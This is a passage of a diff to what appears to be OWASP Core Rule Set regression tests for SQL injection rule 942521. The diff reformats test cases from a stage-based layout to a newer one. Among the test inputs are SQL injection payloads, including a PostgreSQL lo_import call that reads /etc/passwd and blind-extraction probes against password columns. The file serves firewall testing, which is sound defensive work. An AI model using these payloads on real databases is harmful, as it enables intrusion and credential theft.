..%60%21%21%21%27%21%27%40%60%60...%22%21%21%21%21%60%27%40%22%22%40%22...%60%40%40%27..%22%21%21%21%21%60..%27%40%40%27%40%40%27..%22%40%40%40%40%60....%60%40%40%40%60%40%40%40%40%60%22%21%21%21%60%21%60%40%40%40%22..%27%40%40%40%60%40%40%60%60%22%40%40%40%40%22%21%21%60%40%40%22%40%60%21%21%60%27.....%27%40%40%40%40%40%22.%60%21%21%21%21%60%21%21%60.....%22%21%21%27%27%21%22%40%40%40%27%27%22%40%40%40%40%60....%60%22.%27%21%21%21%27%40%40%40%40%60...%27..%60%21%21%60...%60%21%60%40%40%27.....%27%40%40%27%27%40%40%27..%27.%27%40%22%27%21%22%40%40%22%21%21%21%27%60.....%60.....%22.%60%40%60%40%40%40%60..%22.....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%40%40%22%40%40%40%40%40%27....%60.%27....%27%21%21%21%60%21%21%21%21%21%60..%27.%27%40%40%22%60%40%40%40%60.....%27...%27%21%21%21%21%60..%60....%60%40%40%40%27%21%21%21%27%60%21%21%21%21%27...%60%40%40%40%60....%60%27%40%40%40%40%27%40%40%60..%27%40%40%27..%27%22%21%22%40%40%40%27...%22%21%21%21%21%21%60%40%40%40%40%40%22%40%40%40%40%22%60%21%27..%60%21%21%21%27%40%40%40%22%21%21%21%21%27%40%40%40%40%22%40%60%22.....%22.....%27%40%40%40%40%40%27%21%21%21%21%27%40%27%40%40%40%40%40%27%60%27%22%21%22%21%21%21%21%60%40%40%40%40%40%27..%22.%60%40%40%40%40%40%22.%60%60%21%21%21%21%21%60%21%21%21%22...%60%40%22%21%21%21%21%22%21%21%60%40%40%40%40%60%21%21%21%21%22%40%27%21%21%21%60%27%40%40%40%40%22.....%60....%22...%60%21%21%21%21%60%21%21%21%21%21%27%40%40%60%40%40%40%40%27%40%60%21%22.....%22%21%21%21%27%40%40%40%40%27....%22%40%40%40%40%40%60%40%27.....%22%21%21%21%60%40%40%60%21%21%21%21%21%22%60%40%40%40%40%27%21%21%21%22...%60%40%60...%27...%60%21%21%21%22%21%21%21%21%27%21%27%21%21%60.%60%21%21%60..%22..%60.....%22..%22....%27%21%21%21%21%27%60%40%40%40%40%40%22%21%21%21%21%22%40%40%40%40%40%27%40%40%40%40%40%60.%60....%60%60%40%40%40%40%22%27%40%27%40%60%21%21%21%21%21%27...%27%40%40%40%40%40%27.%27.....%60%21%21%60%21%21%21%21%21%22%22%40%40%40%27%40%60%21%21%21%22%21%21%21%21%21%27..%22....%27%21%21%21%21%21%27...%60.....%60%40%22%21%21%21%21%27%27%21%21%21%21%21%22%60%27%21%21%21%27..%60%40%60%21%21%21%21%21%27%60%27%21%21%27%21%21%21%60%21%21%21%21%27%40%60%22%21%60.....%27%40%40%40%40%40%27.....%60%21%21%60%40%40%40%27...%60%21%21%21%60%40%40%40%22%22%21%21%21%21%21%22%40%40%40%40%27%40%22.%22.%22%40%40%40%40%40%22%40%60....%60....%27%21%21%21%21%21%22%21%21%21%21%60%21%21%21%21%21%27....%27%21%21%21%21%60%22%60%40%40%40%40%40%60...%22%40%60%40%40%22%40%40%40%40%40%27%21%21%27%22%40%40%60%27%22%40%40%40%22%21%60%27%21%21%21%21%21%60...%27%40%40%22%21%21%21%27%21%27%21%21%21%60%21%21%21%21%21%60%22.....%22%21%21%21%21%27%40%40%40%40%60%21%21%27.....%22%21%21%21%22%21%21%22%21%21%22%40%40%27%21%21%21%21%22%40%40%40%40%27%40%40%40%40%27....%60%40%40%40%60%40%22...%27.....%27%40%40%22%40%40%40%22%21%21%21%21%21%22...%27..%22%21%22%40%40%40%40%40%27....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%22%27%40%40%40%40%40%60%21%21%21%27%40%40%40%27%60.%27%21%21%21%22....%60%40%27.....%22%40%40%40%40%40%27%40%60%40%40%40%40%60%40%40%40%60%21%21%21%21%21%60%27%21%21%21%27....%22%22%21%21%27...%27%21%21%21%27...%27%40%22....%22%40%40%27%21%21%21%21%27.....%22%40%40%40%40%27%22....%22...%27%21%21%21%60....%22%40%40%40%22...%27%40%27..%60%21%21%27%40%40%40%40%40%60%40%60%21%21%21%21%21%27.....%60%27%22%22%27%27.%22%60%21%21%22%40%40%60%21%22%60%21%21%27..%60%21%21%21%21%60%21%21%21%21%21%60%40%40%22%21%21%21%21%21%60%40%40%60....%60%40%40%40%40%40%22%40%40%40%40%60.....%60%27%27...%27%22%22%40%40%60.....%22%22%27%40%60%27%27.....%22%40%27%60.....%60%40%22%40%40%40%40%27%21%21%21%21%60%40%40%40%27%40%40%40%40%40%22%21%21%21%21%60.%22%21%21%27%40%27%22%21%21%21%21%60%40%40%27%40%40%40%40%27%21%21%27%27..%27%27%21%21%21%21%21%27%40%27.%60%21%21%21%21%21%27%40%40%40%40%27%21%21%27%40%40%40%40%22...%22%60%27%40%40%40%22%40%40%40%22%22%21%21%21%22%21%21%60...%27.....%60%40%40%40%60%21%21%21%60%40%40%40%40%40%22%22%21%21%21%60%21%21%21%21%21%27%27%21%21%21%21%22....%27%21%21%21%21%21%27%21%21%21%22%21%21%21%21%21%27%22....%60%27%40%40%27%21%27.....%22%21%22%21%21%21%21%21%22%21%21%21%21%22...%27%22%40%40%40%60%40%40%40%40%40%27%27%21%21%27....%22.....%22%21%21%21%22%40%40%40%40%40%27%21%21%21%21%60%22.....%60..%60%22%21%21%21%22%22%27...%27%40%40%40%40%27.....%27%21%21%21%60...%27.%22%21%21%21%21%21%27%21%27%21%21%21%22%40%27.....%27%21%21%21%21%22%40%27...%27%21%21%27%40%40%22%40%40%40%40%40%60..%27%21%27.....%22%22%21%21%21%21%21%27%40%40%40%40%22%40%40%40%60.....%60%21%21%21%21%21%27....%27%27%40%40%40%40%27.....%27%21%60....%22...%22%21%21%21%21%27%21%21%22%40%27%40%40%40%40%40%27%21%21%21%22%21%21%21%21%27%21%21%21%21%60%27%27..%22%22%21%21%21%27%22%21%60..%22%27%27%60..%22%21%22%21%21%21%21%21%27..%27..%27.%27%27%21%21%21%21%60%27%21%21%21%21%60..%27%21%21%22.....%22%21%21%21%21%27%21%21%21%27....%60.....%22...%22%22%22.%22%27.%60%21%21%21%21%22%60%40%22.....%27%21%21%21%21%22%40%60...%22.%22.....%27%27..%22%27%21%21%21%21%21%60....%22%21%21%21%22..%60%21%21%21%21%60%21%21%21%21%27....%60%27%40%40%40%22%27.%27....%22%40%40%40%60%21%21%21%21%22%40%40%40%40%40%27%21%21%21%60%40%40%40%40%60.%22..%22%40%40%22%21%60%22%21%21%21%21%27%27%27.%27%22%40%40%40%22%40%40%40%27....%22%21%21%21%21%21%22%21%21%21%21%22%21%27%60%27%21%21%21%60%21%27...%60%21%21%21%21%27...%27%40%40%40%40%40%60%21%21%60%21%21%21%22%40%60%40%40%40%40%40%60%27%60..%22%22%21%21%27%22%40%40%27...%22..%22....%22%27%60%40%40%27....%27%40%40%40%40%22%60%21%21%60.%60%40%27%21%60%21%22...%27...%27.....%27%21%21%22..%22%22%40%27%21%21%21%27%40%40%22.%27%21%21%21%60%40%60%60%21%21%21%60%21%21%22...%27.%22%21%21%21%27...%22%21%21%21%21%60%40%40%40%40%60%22.%27%21%21%60.....%60%21%21%60%21%21%21%21%21%27.%27%40%40%40%40%40%22%21%21%21%60..%27%21%21%21%21%21%27%21%21%60%40%40%27%21%21%21%27.%22%21%21%21%21%22.%22%40%40%40%40%40%22%21%21%21%22%21%21%22%22%21%21%21%60%27%21%21%60%40%40%40%40%40%27..%27%40%60.....%22%21%21%21%27.%27%21%21%21%21%27%27....%22%40%40%27%40%40%40%40%40%60%60or" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_id: 18 desc: "Performance test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_id: 19 desc: "Negative test: performance test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_id: 20 desc: "Detect admin%40juice-sh.op'and%20likely%20(id)--" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_id: 21 desc: "Detects odd number of quotes in request headers" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "1' and starts_with(password) and 'true" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "1' and starts_with(password) and 'true" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_id: 22 desc: "Detects odd number of quotes in request headers" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "1' and lo_import('/etc' || '/pass' || 'wd')::int::bool and 'true" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "1' and lo_import('/etc' || '/pass' || 'wd')::int::bool and 'true" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_id: 23 desc: "Detects odd number of quotes in request headers" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "1' and lo_get(16400)::text::bool and 'true" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "1' and lo_get(16400)::text::bool and 'true" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_id: 24 desc: "Detects odd number of quotes in request headers" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "1'and json_search (json_array(password),0b11000010110110001101100,'t_______________')#" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942521" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "1'and json_search (json_array(password),0b11000010110110001101100,'t_______________')#" + Accept: 